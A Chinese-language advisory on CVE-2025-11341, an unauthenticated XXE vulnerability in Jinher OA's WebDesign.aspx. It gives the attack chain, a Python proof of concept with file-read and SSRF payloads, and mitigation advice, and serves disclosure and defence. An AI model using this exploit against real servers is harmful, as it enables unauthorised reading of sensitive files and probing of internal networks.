CVE-2025-11341：金和OA XXE外部实体注入漏洞

漏洞信息

漏洞编号

CVE-2025-11341

漏洞类型

XXE（XML外部实体注入）

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

金和OA（Jinher OA）

漏洞概述

CVE-2025-11341是金和OA（Jinher OA）办公自动化系统中存在的一个高危安全漏洞，影响版本为2.0及以下。该漏洞位于系统文件/c6/Jhsoft.Web.module/eformaspx/WebDesign.aspx中，具体涉及type=SystemUserInfo&style=1参数的XML处理逻辑。攻击者可以通过构造恶意的XML外部实体引用（XXE），利用未正确配置或缺失的XML解析器安全防护机制，实现对服务器端敏感文件的读取、远程数据获取，甚至在特定条件下执行远程代码。该漏洞的CVSS 3.1评分为7.3，属于高危级别，其攻击向量为网络（AV:N），无需认证（PR:N）和用户交互（UI:N）即可远程利用，对系统的机密性、完整性和可用性均造成低级别影响。值得注意的是，该漏洞的利用代码已被公开发布，意味着实际被攻击的风险较高。该漏洞由[email protected]发现并报告，于2025年10月6日正式披露。金和OA作为国内广泛使用的企业级协同办公系统，一旦遭受攻击，可能导致企业内部敏感信息泄露、业务数据被篡改等严重后果，对企业信息安全构成重大威胁。

技术细节

XXE（XML External Entity）注入漏洞的根本原因在于应用程序在解析XML输入时，未正确禁用外部实体和DTD（Document Type Definition）的处理功能。在金和OA的WebDesign.aspx页面中，当type参数设置为SystemUserInfo且style参数为1时，系统会处理用户提交的XML数据，但未对XML解析器进行安全配置，允许加载外部实体。攻击者可以构造包含恶意DOCTYPE声明的XML Payload，通过SYSTEM关键字引用外部资源（如本地文件file:///、远程URL等），XML解析器在解析时会自动加载并展开这些实体内容，从而实现以下攻击目的：1）通过file://协议读取服务器本地敏感文件（如配置文件、数据库连接字符串、系统密码文件等）；2）通过http://等协议进行SSRF（服务端请求伪造）攻击，探测内网拓扑或访问内部服务；3）结合其他漏洞实现远程代码执行。攻击者只需向目标URL发送包含恶意XML数据的HTTP请求，即可触发漏洞，整个攻击过程无需任何认证和用户交互，具有极高的隐蔽性和危害性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具识别目标网络中运行金和OA 2.0及以下版本的服务器，确认目标系统存在漏洞。

STEP 2

步骤2：构造XXE Payload

攻击者构造包含恶意DOCTYPE声明的XML数据，使用SYSTEM关键字引用外部实体（如file:///协议读取本地文件或http://协议进行SSRF探测）。

STEP 3

步骤3：发送恶意请求

向/c6/Jhsoft.Web.module/eformaspx/WebDesign.aspx/?type=SystemUserInfo&style=1发送包含XXE Payload的HTTP POST请求，无需任何认证。

STEP 4

步骤4：触发实体解析

服务器端的XML解析器未禁用外部实体处理，自动加载并展开恶意实体内容，将敏感文件内容或内网探测结果返回给攻击者。

STEP 5

步骤5：数据窃取与进一步渗透

攻击者获取服务器敏感信息（如配置文件、密码哈希等），利用这些信息进行横向移动或权限提升，扩展攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11341 - Jinher OA XXE Vulnerability PoC
# Vulnerability: XML External Entity Injection in WebDesign.aspx
# Affected: Jinher OA <= 2.0

import requests

TARGET_URL = "http://target.com/c6/Jhsoft.Web.module/eformaspx/WebDesign.aspx/?type=SystemUserInfo&style=1"

# Malicious XXE payload to read local files
xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root>
  <userinfo>&xxe;</userinfo>
</root>"""

# Alternative: SSRF payload to probe internal services
xxe_ssrf_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-service/admin">
]>
<root>
  <userinfo>&xxe;</userinfo>
</root>"""

def exploit_xxe(url, payload):
    """
    Send XXE payload to vulnerable endpoint
    """
    headers = {
        "Content-Type": "application/xml",
        "User-Agent": "Mozilla/5.0"
    }
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response:\n{response.text}")
        return response.text
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] Exploiting CVE-2025-11341 - Jinher OA XXE")
    print(f"[*] Target: {TARGET_URL}")
    result = exploit_xxe(TARGET_URL, xxe_payload)

影响范围

金和OA（Jinher OA） <= 2.0

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）在XML解析器中显式禁用外部实体加载（如设置setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)）；2）使用WAF规则过滤包含DOCTYPE、ENTITY、SYSTEM等关键字的恶意XML请求；3）限制Web应用对敏感系统文件的访问权限；4）监控异常的网络出站连接，防止数据外泄；5）对关键业务系统进行网络隔离，限制不必要的外部访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11341
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11341
3 Details https://www.cvedetails.com/cve/CVE-2025-11341/
4 VulDB https://vuldb.com/cve/CVE-2025-11341
5 Link https://github.com/rookie1006/CVE/issues/2
6 Link https://vuldb.com/?ctiid.327226
7 Link https://vuldb.com/?id.327226
8 Link https://vuldb.com/?submit.664613